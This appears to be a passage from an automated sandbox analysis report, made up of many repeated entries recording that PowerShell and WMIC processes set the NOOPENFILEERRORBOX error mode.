              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
